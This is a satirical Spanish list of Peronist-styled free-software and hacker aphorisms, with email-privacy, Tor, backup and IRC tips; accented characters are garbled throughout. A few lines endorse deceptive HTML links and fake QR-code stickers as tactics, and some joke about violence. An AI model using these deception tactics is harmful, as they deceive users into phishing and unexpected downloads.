La verdadera computaci�n es aquella donde la CPU hace lo que el usuario quiere, y defiende un s�lo inter�s: el del usuario.
En la acci�n pol�tica la escala de valores de todo peronista es la siguiente: primero la libertad de ejecuci�n, despu�s la de copia, y luego los Hombres.
Si tiene CPU, puede peronizarse.
Compartir software es Libertar.
Todo software libre ha de poder trabajar junto con otro software libre: para un software libre no ha de haber nada mejor que otro software libre.
A los muchachos les gusta ponerse calificativos. Los hay Ubunteros, los hay Debianeros, los hay Fedoreros, los hay OpenBSDeros. Pero todos trabajan...
En nuestro sistema los �nicos privilegiados son los usuarios.
Un hardware sin software es como un cuerpo sin alma. Por eso el peronismo usa software libre.
Lo mejor viene en kilobytes.
Mejor que copiar es compartir, mejor que ejecutar es compilar.
Byte compartido es byte liberado.
Queremos un software socialmente justo, econ�micamente libre, y pol�ticamente soberano.
Constituimos un kernel monol�tico, una paqueter�a organizada y aplicaciones libres.
640K no deben ser suficientes para nadie.
Dentro de la Terminal, todo. Fuera de la Terminal, NI JUSTICIA.
Y cuando uno de nuestros servidores caiga, caer�n cinco de los de ellos.
Compilar, base para Ejecutar. Ejecutar, base para Copiar. Y Copiar, base para Compartir.
En la comunidad de hackers no existe m�s que una sola clase de hombres: la de los que compilan.
Todo este mundo maravilloso que estamos viviendo -t�cnico y cient�fico- es consecuencia y se ha gestado con el sacrificio de los Pueblos, especialmente de los trabajadores.
El c�mputo ha de ser de quien lo trabaja, y no del que vive consumiendo sin producir.
El hacker programa para el Movimiento del software libre. Quien sirve a una compa��a lo es s�lo de nombre.
En GNU, compilar es un derecho que crea dignidad humana y es un deber, porque es justo que todos compilen al menos lo que ejecutan.
Para nosotros un depurador no es un fin, sino el medio para el bien del kernel y la grandeza y felicidad de sus hackers.
La organizaci�n de los paquetes y su ejecuci�n tienen por fin el bienestar de los hackers, dentro de un orden que atienda al desarrollo de la Justicia Social.
Los dos brazos del hacktivismo son el Software Libre y el Hardware Libre. Con ellos damos a los hackers un abrazo de Justicia y Amor.
El hacktivismo quiere la unidad de los hackers y no la lucha. Queremos POSIX, pero no formateos.
El c�mputo no es libre, o lo utiliza el Pueblo Organizado en beneficio propio, o la utilizar� el Capital en su desmedro irremediable.
Marcharemos con GNU en el Linux, o con Linux en el GNU.
GNU nos da la fuerza, POSIX la cohesi�n.
No es que los similares a Unix sean tan buenos. Es que los dem�s han sido peores.
A m�s bits, menos tiempo.
Quien quiera copiar, que copie, y quien quiera compilar, que compile.
Y aunque deje en el browser metadatos de mi vida, yo s� que ustedes copiar�n mi c�digo y lo llevar�n como bandera a la victoria.
En computaci�n jam�s hay que piratear a nadie. Hay que decompilar todo lo que se pueda.
Que sepan hoy los indignos farsantes que este pueblo no piratea a quien no lo traiciona.
El Software Libre no es un programa, es una Doctrina.
El Software Libre es Justicia Social 2.0.
El software libre es la finalidad maquinada en el alma colectiva de la comunidad organizada. Su arquitectura define sus formas de ejecuci�n.
La unidad del c�digo hace que cada programador vea los problemas, los comprenda y los aprecie de una misma manera. Y de una misma manera de percibir y de apreciar resulta una misma manera de compilar. Eso lleva a la unidad de acci�n.
Que todos sean art�fices del c�digo com�n, pero ninguno instrumento de la ambici�n de nadie.
Administrar Unix es f�cil. Lo dif�cil es Conducir una Comunidad.
El Software Libre necesita ap�stoles y para ser ap�stol hay que estar dispuesto a ser h�roe, y solamente los fan�ticos de amor por una causa son capaces de morir por un ideal.
Dividimos la industria del software en dos categor�as: una, la de los hombres que programan, y la otra, la que vive de los hombres que programan. Ante esta situaci�n, nos hemos colocado abiertamente del lado de los que programan.
Llevo en mis o�dos la m�s maravillosa m�sica: aquella sintetizada con software libre.
Yo he visto BSDeros que se han vuelto Linuxeros, pero no he visto jam�s un Window$ero volverse inteligente.
Sin Software Libre no hay posibilidad de Justicia Social 2.0.
En nuestro tiempo, programar es crear Software Libre.
El Software Libre vence al Tiempo.
Cuando el disco r�gido mec�nico agota su vida �til, suele tronar como escarmiento.
Copiar no es como muchos creen, piratear, copiar es distinto que piratear, Piratear es ajusticiar, copiar es compartir, y al software siempre es mejor compartirlo que piratearlo.
Esto se programa, se compila, se ejecuta, y reci�n despu�s se copia. Es decir, el software depende de esa acci�n, de una preparaci�n, y de una organizaci�n.
El kernel no se ejecuta de buenas ideas; se ejecuta de buenas compilaciones.
Antes que las propias, es mejor reconocer las buenas ideas del Pueblo. Programa en C lo que el Pueblo desea, y lib�ralo bajo GPLv3.
Creo que el software es movimiento, son acci�n no son solo pensamiento, no son s�lo concepci�n. Para m�, la acci�n est� siempre por sobre la concepci�n.
El software a nadie le sale al paso, no es obra de la casualidad, el software es obra de la previsi�n, de la organizaci�n y la realizaci�n libre.
No hay peor cosa que un Window$ero con inquietudes.
Los requerimientos del software suben en ascensor, la potencia del hardware por escalera.
�Programadores! �nanse. Sobre la unidad de los que programan, ha de levantarse en este hermoso server la uni�n de todas las aplicaciones.
Tengo tres honras en mi vida: la de ser un soldado, la de ser un patriota y la de ser el primer programador argentino.
Que sea esta unidad indestructible e infinita, para que nuestro pueblo no solamente posea su almacenamiento, sino que tambi�n sepa dignamente defenderlo.
Primero el Kernel, luego la Shell, y por �ltimo las aplicaciones.
Se vence con inteligencia y organizaci�n. Por ello les pido tambi�n que conserven una calma absoluta y cumplir con lo que es nuestro lema de siempre: de /home a /var y de var/ a /home.
Se compila con inteligencia y con organizaci�n.
Todo sistema inform�tico deber�a ser infalible, pero no es un arte de los Dioses sino una creaci�n humana, y como tal posee sus mismos bugs y las mismas inclemencias que afectan a toda m�quina engendrada en la mente terrenal.
Este bug lo arreglamos entre todos o no lo arregla nadie.
La verdadera colaboraci�n no es alabar siempre, sino se�alar los bugs.
El programador debe escribir un lenguaje claro, esto llevar� a realizar un binario de verdad, que podr� compartir en amistad.
El verdadero hacker es el que aconseja.
El software libre ha de estar en capacidad de ayudarnos en cualquier situaci�n que se cuadre, incluyendo probables situaciones de emergencia.
No uses al Justicialismo como una variable. Hardcod�ala.
Mal est� llorar sobre la leche derramada, si el Software Libre puede otorgarnos otra vaca, y gratis.
No podemos estar aislados. En los tiempos que corren, hemos de subirnos a tren de las comunicaciones informatizadas y saludar a todo el mundo.
Cualquiera puede hacer uso de su inform�tica sin costo monetario, y permiti�ndonos multiplicar su efectos positivos en todo tiempo y lugar.
Hemos de formar �giles bandas telem�ticas, encargadas de hacer tronar el escarmiento y propiciar la independencia real de la Naci�n, su Pueblo y su software.
Nuestro enorme campo de acci�n son las redes, pretendidas por el enemigo pero dominadas por nuestro Pueblo.
Encomio lo compilado.
Mueran los salvages unarios.
El software privativo, que ha sido hasta ahora una forma disimulada de la tecno-esclavitud, ser� suprimido. Eso se acab�.
Si el oligarca no puede pagar los metadatos, deber� vender su centro de datos.
Donde hay una necesidad, nace un software libre.
La m�quina, el servidor, el centro de datos y cualquier establecimiento que se encuentre fuera de las leyes del trabajo, no pueden gozar de ninguno de los beneficios que concede el Estado. Hay que tratados como enemigos sociales.
El c�digo es m�s poderoso que las leyes.
La infraestructura de correo electr�nico que se utiliza en todo el mundo es, por dise�o, insegura.
La mayor�a de los servidores de correo p�blicos no est�n controlados por los destinatarios, sino que son ofrecidos por proveedores de Internet de la oligarqu�a.
Debemos desconfiar de los servidores de correo ofrecidos por la oligarqu�a. Han demostrado no tener escr�pulo alguno y acceder a correspondencia electr�nica de aquellos abonados a quienes consideran riesgosos para sus planes inconfesables.
Los correos electr�nicos conformados por c�digo HTML permiten colocar hiperenlaces de texto amigable para el usuario que oculten una URL. S�lo debes utilizarlo para combatir al Capital.
Con s�lo superponer una etiqueta autoadhesiva de un c�digo QR que codifique un hiperenlace HTML enga�oso, har� que un usuario incauto solicite copias de contenido inform�tico remoto distinto al esperado en su dispositivo de confianza. Recurre a esto para Combatir al Capital.
Colocar un hiperenlace HTML enga�oso bajo un texto amistoso podr�a llevar a los incautos a una p�gina diferente a la esperada.
Un hiperenlace enga�oso es un vector extremadamente com�n para los ataques de suplantaci�n de identidad. En ellos, un remitente malicioso podr�a hacer que el usuario incauto solicite copias de contenido inform�tico remoto distinto al esperado.
El HTML es un conjunto de especificaciones extremadamente largo y complicado, dise�ado para navegar por la web, donde hay una gran variedad de documentos, aplicaciones, etc.
El HTML fue dise�ado sin tener en cuenta el correo electr�nico.
Una gran parte (si no la mayor�a) de las funcionalidades del HTML son indeseables para el correo electr�nico; si se incluyen pueden abusarse para extraer informaci�n sobre ti, tus contactos, tu calendario, otros correos en tu bandeja de entrada, etc.
La ejecuci�n remota es una de las funcionalidades del HTML m�s abusadas en el correo electr�nico.
Los correos HTML son buenos para publicistas, pero malos para todos los dem�s.
Todos los correos HTML enviados por publicistas incluyen identificadores en los enlaces y en las im�genes que est�n dise�ados para extraer informaci�n sobre los usuarios y envi�rsela de vuelta a quien env�a el mensaje.
Examina con atenci�n las URL: las ristras extra�as de n�meros y letras son �nicas para ti y se utilizan para identificarte. Otros usar�n dicha informaci�n para manipularte, intentando buscar anuncios que son m�s propensos a influir sobre tus h�bitos de compra.
Navegar por la web es un gran reto para los individuos que necesitan un lector de pantalla o alguna otra herramienta de asistencia para usar su ordenador. Recurre desinteresadamente al texto plano y a las descripciones alternativas de contenidos para ayudarlos.
Volver accesible un correo HTML a los individuos que necesitan un lector de pantalla u otra herramienta de asistencia para usar el ordenador, es incluso m�s complicado que hacer una web accesible, debido a las limitaciones impuestas por la mayor�a de clientes de correo electr�nico.
Los correos en texto plano son pan comido para los lectores de pantalla, especialmente para clientes de correo dise�ados para ello.
Cuando redactes un correo electr�nico en texto plano, es �til recortar sus l�neas a un ancho m�ximo de 72 caracteres, introduciendo saltos de l�nea despu�s de la palabra m�s cercana a dicho m�rgen.
Al responder un correo en texto plano, no propicies que se responda sobre la cita. En lugar de ello, a�ade dos saltos de l�nea sobre el mensaje citado. Esto permitir� que se edite el mensaje citado. Cita cada l�nea del mensaje anterior con > y un espacio, seguido de la cita.
Aunque algunos clientes de correo electr�nico intentan hacer creer lo contrario, puedes editar la versi�n citada del mensaje al que est�s respondiendo, y es recomendable que lo hagas.
Puedes enfatizar tu correo electr�nico en texto plano mediante *asteriscos*, /barras/, _guiones bajos_ o MAY�SCULAS, y evitar�s los enormes inconvenientes de utilizar HTML en ellos.
La oligarqu�a ha hecho - a falta de ley adecuada de protecci�n - abusos inform�ticos duraderos.
Para contrarrestar la insidiosa acci�n olig�rquica sobre la telem�tica contamos con dos soluciones libres interdependientes: la firma digital de los mensajes de correo electr�nico, y su cifrado por medio del criptosistema GnuPG.
No todos podremos programar un n�cleo de sistema operativo, pero si todos podemos instruir a un Compa�ero en la senda para la liberaci�n que significa emplear un software liberado bajo licencia GPLv3.
No existen excusas para quien -sabiendo emplear programas libres-, no pueda transmitir ese conocimiento a quien lo necesita.
La CPU debe estar al servicio de la econom�a nacional y tener como principal objeto el bienestar social.
La PC es un bien individual en funci�n social.
Como siempre sucede durante las actualizaciones de versi�n de sistema, debemos proceder a realizar un respaldo de nuestros datos, por las dudas que algo salga mal.
La cinta se desmagnetiza, los CDs se deslaminan, las redes se caen.
Prevenir es siempre mejor que curar, y una actualizaci�n de sistema siempre es excusa adecuada para actualizar nuestras copias de respaldo.
RAID5 no es un respaldo.
Si bien al actualizar el sistema todo deber�a marchar adecuadamente, a seguro se lo llevaron preso.
Si bien el quehacer y potencia de nuestra Doctrina est�n consolidadas en los servidores y en los entornos de alta complejidad, es Ubuntu el sistema que permite integrar con m�s amor al sector del usuario descamisado.
Hemos desarrollado los sistemas multiusuario para la aplicaci�n cient�fica, pero m�s que nada para dar una respuesta a la injerencia y a la injusticia que significaban los sistemas operativos privativos.
Contra el Capital y contra el software privativo la lucha jam�s ha de darse por vencida. Cu�ntos han sido los cocodrilos bien intencionados que han ido a roncar s�lo para despertar envolviendo unos mangos...
Nuestro Movimiento, anclado en una vertiente de Justicia Social en el software, ha desarrollado una red tan oscura como la piel de nuestros grasitas. Se trata del proyecto Tor.
Un problema b�sico para el anonimato y privacidad digital radica en lo obvio: que el enemigo intercepte el tr�fico telem�tico.
Han de considerar el correo electr�nico como lo que es: una carta abierta. Si desean privar de su lectura a los contreras, habr�n de encriptarlo con GPG.
La mal llamada "nube" es en realidad una computadora ajena.
Si alguien dice que su computadora puesta en l�nea es una "nube", est� enga�ando con insidia a incautos. No ha de almacenarse all� informaci�n alguna.
Si por absoluta necesidad debes almacenar informaci�n en una computadora ajena que publicitan como "nube", aseg�rate de encriptar dichos datos muy severamente.
Toda nube es humo. Comun�cate con humo.
Yo no persuad�a al Pueblo con kernels, porque un kernel poco persuade. Yo persuad� al Pueblo con compiladores y con el cubo 3D de Compiz.
�Y c�mo construyo un kernel? Ped� usar el compilador GCC... no lo conoc�a ni el gato. Y ah� empec� a compilar piezas de c�digo. Y una cosa lleva a la otra, y todas a la felicidad de los hackers...
El kernel es el n�cleo del sistema operativo y equivale a su alma y coraz�n. Lo de afuera es la shell: s�lo c�scara.
El compilador GCC es el kil�metro cero de GNU.
Hemos programado y compilado un software: el GNU. Lo hemos hecho para esta comunidad de hackers y para esta m�quina, pero puede servir para otras.
Y como nunca fuimos ego�stas, desde que en todo momento pusimos generosamente nuestra CPU al servicio del mundo, ofrecemos a todos los hombres y mujeres nuestro software.
Nosotros queremos que cada programador conozca el c�digo, y que est� impulsado hacia los objetivos de la compilaci�n.
El c�digo fuente ha de ser de quien lo trabaja.
Nosotros queremos que cada programador se interese por su $HOME como si fuera su propia casa, porque el Pubnix es la casa grande de todos los hermanos de esta inmensa familia de hackers.
Nuestro Pubnix, al afirmar su deseo de uni�n en las redes, es due�o de s� mismo, y capaz de defender la integridad de su existencia.
Nosotros vamos llevando adelante el entrelazamiento de datos porque all� est� el futuro de nuestra amistad con los dem�s hackers. Las comunidades que entrelazan sus datos siguen siendo amigas, a pesar de las muchas cosas que puedan ocurrir.
Hoy los hackers est�n construyendo nuevas comunidades. No se pueden ver, excepto en la pantalla de una computadora. No se pueden visitar, excepto a trav�s del teclado.
Las comunidades del ciberespacio son tan reales y vibrantes como cualquiera que pueda encontrar en un globo terr�queo o en un atlas.
Los hackers son personas reales al otro lado del monitor.
La uni�n de los hackers es consecuencia de la uni�n de los Pueblos.
Liberados de limitaciones f�sicas, nuestros hackers est�n desarrollando nuevos tipos de comunidades cohesionadas y efectivas.
Las comunidades del ciberespacio que se definen m�s por intereses y prop�sitos comunes que por un accidente geogr�fico.
En las comunidades del ciberespacio lo que realmente cuenta no es c�mo se ve o habla o qu� edad tiene, sino lo que uno dice, piensa y siente.
No es sorprendente que los cient�ficos hayan sido los primeros en adoptar los nuevos medios electr�nicos como su principal medio de comunicaci�n cotidiana.
Nuestras autopistas son cables y fibras �pticas; nuestro lenguaje, una serie de unos y ceros.
Todo troncal de fibra �ptica es sendero luminoso para la revoluci�n del baudio.
Llegar� el d�a en que todos, no s�lo los cient�ficos, puedan disfrutar de los beneficios similares de una comunidad global.
GCC, la unidad de los compiladores, y al que no le gusta, se jode, se jode.
Hubo uno que hasta tuvo que hacer milagros para que lo siguieran doce. Compilando este Kernel ya me siguen millones.
Un hacker usa la CPU funci�n del Pueblo.
Un hacking es un acto de desobediencia tecnol�gica.
Existen especialidades dentro del hacking de computadoras. Un hacker de algoritmos conoce el mejor algoritmo para un problema. Un hacker de sistema conoce del dise�o y mantenimiento de sistemas operativos. Y un hacker de contrase�as sabe c�mo descubrir la contrase�a de alguien m�s.
De la calidad del kernel depende la calidad de las aplicaciones.
Al operar GNU correr� programas libres; que se compilan, modifican, y aunque no quieran tener bugs, los tienen.
El software de GNU es un fin en s� mismo, no s�lo medio. Son programas de computadora cuyos usuarios han de tener las cuatro libertades y no otras; programas que buscan la felicidad de la Comunidad Organizada.
Yo divido la acci�n de GNU en dos vertientes: la acci�n administrativa (para la cual tiene un peque�o conjunto de aplicaciones en /usr/sbin), y la acci�n de lucha, que sucede en /usr/bin.
Unix exist�a antes que GNU, pero fue GNU quien les dio el lugar que los hackers merec�an por justo derecho.
Un hacker debe ser - fundamentalmente - un amat�ur, aunque los hackers pueden recibir paga por su expertise.
La vida de un verdadero hacker es epis�dica, en lugar de programada.
Un hack puede ser cualquier cosa, desde una broma pr�ctica a un brillante programa novedoso de computadora.
En esta red de datos, lo mejor que tenemos es GNU.
Me hacen gracia los que se dicen hackers usando Window$. No hay hackers fuertes en un sistema operativo d�bil.
El Pueblo que escribe c�digo malicioso a menudo anhela el mayor retorno por su inversi�n, de modo que intentan socavar a Window$.
A Window$ siempre es mejor formatearlo que emparcharlo.
En sus bugs se camufla Window$.
La gran discusi�n en la que se sumir� el mundo no radica en compilar el software, sino qui�n conduce la compilaci�n del software. Yo digo que la compilaci�n la tiene que realizar el Pueblo.
20 gigabytes organizados equivalen a 20 petabytes desorganizados.
El hacktivismo presupone la existencia de la CPU, del ser humano y de una Comunidad Organizada mancomunadamente en pos de su Libertad.
Las redes de datos permiten el sirgimiento de Comunidades Organizadas, precisamente porque la red permite nuevas formas de comunicaci�n.
Una manera muy simple de an�lisis de tr�fico telem�tico puede realizarse en cualquier lugar intermedio, e incluso en estos casos simples, poner en peligro a nuestra Masa de Acci�n y sus organizaciones.
Incluso si encriptamos la carga �til en nuestras comunicaciones, un an�lisis superficial del encabezado del paquete puede a�n revelar gran parte de nuestras actividades y accionar.
Cualquier intermediario en las redes podr�a adaptarse a nuestros patrones de tr�fico telem�tico, y trazar conclusiones relativamente acertadas sobre su contenido, las t�cticas empleadas, etc.
Un actor dedicado puede escrutar la red empleando cruzados estad�sticos sofisticados para rastrear patrones de comunicaci�n de individuos u organizaciones espec�ficas.
Quien programe, comente. Quien use, documente.
Adoctrinar sobre el software libre es tan �til como usar # para agregar comentarios al c�digo fuente.
Tor, a trav�s de sus servidores, ayuda a reducir los riesgos telem�ticos inherentes a trav�s del ofuscado y redistribuci�n de las transacciones a lo largo de m�ltiples secciones en la Internet.
WAIS, Altavista y Webcrawler marcaron la senda que irrevocablemente seguir� Googl?. No existe manera de evitar el destino de quien -abusando de la centralizaci�n- osa desafiar a los Pueblos.
Bajo la oscura capa de Tor se dificultar� rastrear un par de enlace desde su origen y hacia su destino espec�fico, de la misma forma que una liebre podr�a seguir una ruta rebuscada para perder al mast�n.
Que todo FTP tenga su ARCHIE.
Antes que Googl? estuvo Ver�nica.
Antes que Unix estuvo TENEX.
Antes que TENEX estuvo MULTICS.
Antes que MULTICS, estuvo CTSS.
Antes que CTSS, la nada.
Muchachos, ya saben para que es la cosa: si van a meterse con Window$, p�nganse dos antivirus. Uno arriba del otro.
El Movimiento ha desarrollado Mastodon, un software libre pensado para establecer servidores autogestionados de contenidos para microblogging federado. Es posible contar as� con todas las ventajas del blogueo a nivel microsc�pico, pero en un fediverso regido por nuestras propias y convenientes reglas.
"Commodore 64, el c�mputo para las Masas".
Las BBS desaparecieron cuando quisieron cobrar. Cobraron.
Si usted quiere armar una BBS paga, yo organizo una fuerza suficiente, voy, y lo mato.
Debemos imponer distintos protocolos acordados para el env�o y la recepci�n de paquetes inform�ticos, dependiendo de su urgencia, velocidad y vol�menes de bits a transportar. Esta es la manera en la que se puede organizar - desde un punto de vista racional y t�cnico - el manejo paquetizado de la informaci�n.
El FTP es un protocolo simple y popular, y si bien es posible utilizar unas medidas de seguridad limitadas con �l (en forma de sesiones �nicas con usuario y contrase�a, directorios protegidos), actualmente se lo considera un modo de comunicaci�n b�sico, recomendado s�lo para ficheros y material que podamos considerar p�blico.
Si un servidor posee servicio 'FTP anonymous' solamente con teclear la palabra "anonymous" al solicitar su usuario, disfrutar� acceso a dicho sistema.
Disfruto transmitir ficheros con croc por su estilo en lugar de su comodidad.
Al operar en superficie, nos podemos mantener al tanto gracias al Internet Relay Chat, herramental imprescindible para entablar comunicaciones telem�ticas en tiempo real.
Las salas de chat IRC pueden diagramarse dentro de un servidor de la forma que queramos a fin de lograr cierta privacidad, mediante el uso de "canales" (las cuales tambi�n podr�amos llamar "sub-salas").
Los usuarios de IRC normalmente pueden seguir el temperamento de crear sus propias sub-salas tem�ticas, las que suelen indicarse con el s�mbolo "#". Estas permiten orientar las charlas si fuese necesario.
Existen ricas subculturas basadas en el uso de programas de conversaci�n telem�tica.
Si bien es cierto que el IRC puede constituir una forma de interacci�n cerebral atemorizante, mec�nicamente deshumanizada, normalmente es todo lo contrario.
IRC fue inventado para divertirse con las comunicaciones, y este contin�a siendo su uso m�s popular.
Fue el a�o 1988 cuando se compil� el primer programa de IRC, para permitir la comunicaci�n escrita s�ncrona entre m�ltiples usuarios mediados por la Internet.
Los adeptos al IRC pueden f�cilmente volverse adictos.
IRC es - en esencia - un flujo de datos no dirigido.
IRC es una forma de comunicaci�n din�mica: nuevos mensajes aparecer�n en la pantalla, y reemplazar�n a los viejos.
IRC cuenta con los elementos m�nimos de comunicaci�n necesarios para que un grupo de compa�eros cree un sentido compartido de comunidad.
En IRC, el discurso es ef�mero.
Los compa�eros suelen dejar una peque�a "ventana abierta"; en ella se proyecta el texto de una sala de conversaci�n IRC.
Si aparece un mensaje en la ventana de conversaci�n, significa que alguien - en alg�n lugar del mundo - la escribi� no mucho m�s que un segundo atr�s.
Cuando chateas no puedes ver al Pueblo, pero puedes inferirlo.
Sin expresiones faciales, tono de voz, lenguaje corporal, ambiente f�sico compartido y otras pistas contextuales, las emociones pueden transmitirse a trav�s del chat IRC usando emoticones.
Muchos estudios de la comunicaci�n en l�nea han demostrado que los enlaces electr�nicos tienen un efecto deshinibidor en los Pueblos.
Privado de las pistas del estado emocional que brinda el lenguaje corporal, los individuos tienden a olvidar todo sobre los dem�s excepto aquello que se presenta sobre el enlace ASCII.
Hospedados en m�quinas Unix diversas, los compa�rros pueden comunicarse de pantalla a pantalla mediante el programa WRITE.
Los sistemas de chat que permiten a un individuo enviar mensajes mecanografiados directamente al terminal de otra persona enlazada a la misma m�quina se remontan al c�mputo de tiempo compartido de la d�cada de 1960.
Gran parte del software que recibo y env�o est� preparado en lenguaje Python, el nuevo BASIC capaz de correr en todo tipo de m�quinas.
Para conducir a Python, que mejor que un gestor de paquetes de facto: el pip.
Un verdadero hacker ha de poseer la habilidad para dividir su accionamiento inform�tico en partes peque�as comprensibles, que le avalen la realizaci�n de muchos trabajos amenos. El total de sus realizaciones ser� la suma y uni�n de las partes. Esta es la manera en la que Unix nos permite proyectar un futuro provechoso.
M�dem que no chilla, no conecta.
A m�dem r�pido, ruido de l�nea.
El ruido de l�nea es una perturbaci�n el�ctrica en alg�n punto entre su computadora y la otra m�quina con la que se est� comunicando. & El ruido de l�nea corrompe los datos.
Cuando se produzca el ruido de l�nea, ver�s s�mbolos inciertos en tu terminal, en lugar de los caracteres que cabr�a esperar.
Sobre gustos no hay nada escrito. Yo prefiero los Pall Mall o los Particulares picado grueso cortado a cuchillo, pero tambi�n puedo optar por el charuto. En int�rpretes de comandos, uso el Bourne Again Shell, el m�tico Bash.
Power$hell es in�til: no deja de ser una ajada bandera que Micro$oft pretende imponer como reemplazo del poderoso Bash que todos hemos aprendido a dominar.
Un usuario biso�o chocar� con la necesidad de dominar fluidas relaciones de fuerzas entre aquellos programas privativos y los libres.
Por principio nodal, lo natural tiende representar un equilibrio de fuerzas, y la acci�n mas dif�cil es la que nos requiere destruir tal equilibrio. Pero dejen que alguien tenga que pagar un paquete de software y ver�n como se inicia el desequilibrio autom�ticamente: la v�scera m�s sensible es el bolsillo.
Yo no soy partidario de empezar a programar en grande para, muchas veces, terminar en un programa m�rbido; vale m�s seguir la senda de la programaci�n de las peque�as cosas que, con el tiempo, se hacen grandes, se consolidan y se hacen fuertes.
En programaci�n hay ocasiones en las que la flexibilidad y la libertad de acci�n se traducen en tragedia, peor incluso que la del c�lebre burro que, puesto ante dos montones de heno, muri� de hambre por no saber por cual decidirse.
En el caso del sofware, m�s que dilemas, se deber�a hablar de multidilemas (o dilemas s�per ramificados). Pero en caso del software libre todos estos se simplifican y sintetizan a uno solo: el de la lucha contra las ciber-oligarqu�as.
Emplea las redes de datos para incitar el esp�ritu de juicio y lucha contra las ciber-oligarqu�as.
La idea de partida, �sa que puede llegar mediante la intuici�n creativa, por obra y gracia de la meditaci�n trascendental, o por cualquier otro medio por raro que pueda parecernos, se llama "algoritmo".
Un algoritmo es un conjunto de reglas o formas de actuar para la resoluci�n de un problema.
El problema de la liberaci�n del software est� ligado de manera indisoluble con el de la Justicia Social, la soberan�a pol�tica y la independencia econ�mica del Tercer Mundo, as� como la distensi�n y la cooperaci�n internacional.
La Justicia Social en el c�mputo bien vale inconvenir a los tecno-oligarcas.
�Lleva la Justicia Social a las Redes Sociales!
A un pato se lo caza con llamador; unos graznidos realizados con este instrumento cerca de una laguna har�n cureosear a una de estas aves y ah� hay que atizarla. Instalar software libre tambi�n hace lo procedente, y con uno que hable usted capturar� dos o tres zonzos.
La integraci�n de Linux y GNU ocurri� en 1992 cuando Torvalds adopt� la licencia GPL para su kernel. Esto permiti� que los usuarios combinaran Linux con los componentes GNU para crear un sistema operativo libre y completamente funcional conocido como GNU/Linux.
Para cazar una perdiz no efectuamos disparos al cielo con la escopeta esperando que la casualidad nos ayude a pegarle a algo; la t�cnica eficaz consiste en utilizar un perro avispado que busque en el pajonal y nos levanta la perdiz. Un LiveCD con Linux puede hacer lo mismo.
La suma de todos los beneficios sociales benefician a todos. La ense�anza de un sistema Unix tiene tambi�n las mismas implicancias.
Mas que de la pirater�a, yo soy partidario de la libre copia.
Es sabido que un programador ha de contar con las mejores herramientas para hacer su trabajo. Pero muchas veces las mejores herramientas son las que el mismo programador compila y amolda a sus necesidades.
Mi rol como Conductor del Movimiento me impone acercar de forma paternalista las soluciones anheladas por las Masas del Pueblo. Por lo tanto volcar� esta sapiencia para que cada uno lleve en su mochila el bast�n de Mariscal.
Si la conductora del desarrollo de software cuenta con un medio al menos tan bueno como lo es Internet, y sabe dirigir sin coerci�n, muchas programadoras ser�n, inevitablemente, mejor que una.
Al desarrollar software libre, podemos hacerlo en cualquier punto de su escala de aplicaci�n. Para ello nuestro software ha de poder correr en macrocontroladores, pero tambi�n en microcontroladores. Debemos conocer el lenguaje ensamblador, al que dominaremos r�pidamente.
En esto la programaci�n en C es como la naturaleza: es nuclear. Como es nuclear el microcosmos, tambi�n es nuclear el macrocosmos. Y como este software es capaz de correr en microcontroladores, tambi�n habr� de correr en mainframes.
Debemos romper la tranquera del software privativo y si es necesario, cortar la cadena y la mano de las oligarqu�as locales y cipayas.
Nuestros programadores lo han comprendido, y ustedes ya saben qu� distro tienen que instalar.
Me he hecho eco de aquella vieja demanda y anhelo, en la cual todos me piden que les otorgue las herramientas m�s poderosas para su quehacer diario. �La oligarqu�a nunca lo hizo! Sin embargo, nuestra Doctrina avala que cada uno disponga de un potente Unix.
Programar es un arte, y como tal tiene su t�cnica y tiene su teor�a. Conoci�ndolas estas es mucho m�s f�cil programar que ignor�ndolas.
Quien se dedica a la programaci�n debe ser profundamente humanista. El programador siempre trabaja para los dem�s, jam�s para �l.
Nuestros adversarios tienen menos calle que Venecia. Nuestro deber fundamental es hacer pesar la val�a de la libertad de modificaci�n del software, que nunca se presenta asfaltada, y extender nuestro sistema de comando y control a trav�s de valores que son nuestros.
Decir que la CPU es un microprocesador es lo mismo que decir que la CGT es un hombre.
La CPU no es un chip. La CPU es un �rgano.
"Es un chip P6: triplica la velocidad de un Pentium".
El Kernel constituye el �rgano de la conducci�n t�ctica. El �rgano de la conducci�n estrat�gica es el Hacker.
Cuando HP hizo HP/UX y la IBM sac� AIX, supimos que la guerra Unix estaba decidida. Porque si estos se�ores le quieren colgar un Unix al mainframe, es porque no tienen ni calz�n que ponerse pa' ir al baile.
En estos tiempos, pagar una licencia de software es un cr�men.
Puntero mata web UI y justicialismo mata bigdata.
Un programador oficia como orquestador y Maestro Director, ofreciendo a su olfato t�cnico lo mismo que un director de orquesta hace a su o�do. Orienta as� su c�digo en una pieza coherentemente concebida, en la que la sumatoria de las subrutinas ejecutan una idea-fuerza com�n que la CPU llevar� a cabo.
Los avances tecnol�gicos han sido fundamentales para realizar la evoluci�n de los hombres. Lo han sido el fuego, la rueda, la vela, el sextante, hasta terminar en el transistor y las redes conmutadas de datos.
Si no hacemos lo necesario como individuos conscientes en una Comunidad Organizada de la era de la Informaci�n, otros intentar�n hacerlo por nosotros para desinformarnos.
Nuestro Pueblo tiene la necesidad imperiosa de apropiar las tecnolog�as de la informaci�n y darles nuevo uso como un duro ariete contra la Oligarqu�a y las sinarqu�as que lo han dominado.
Cualquiera puede hoy producir contenidos audiovisuales y hacer streaming, con tal de difundir el software libre a las Masas. Clickbaiteando y viralizando podremos extender al Justicialismo a una nueva dimensi�n.
A nuestro Movimiento no le venden globos. Nos ha caracterizado una sana raigambre planfetaria que aclara a cada quien lo que tiene que hacer bajo el lema "todos unidos triunfaremos". Si alguno cree a�n en vacuas promesas a�reas, les pinchamos el l�tex de una.
La responsabilidad que le cabe a los hackers no es otra que la que est�n llevando a la realidad en base a su esfuerzo: formarse y organizarse. Formarse para promover el progreso del kernel, y organizarse para defender el sistema compartido y lanzarse hacia el futuro bajo el signo del Software Libre.
Unix es el bombo. Sus hackers, la manguera.
�En qu� consiste y qu� es cada una de las partes del m�todo de la programaci�n? Primeramente especificar la situaci�n, segundo, la apreciaci�n de esa situaci�n; y tercero, la resoluci�n que surge de esa apreciaci�n de la situaci�n que hemos contemplado. Vale decir, que de la situaci�n y de la apreciaci�n (o sea del fen�meno y del an�lisis) fluye el c�digo fuente.
La inform�tica nos permite distribuir de forma electr�nica todo tipo de documentos, incluyendo libros, y torrentearlos en meros segundos.
La gran compresibilidad de los datos textuales al tornarlos en formato digital vuelven aquella concepci�n "sin papel" en una Realidad Efectiva.
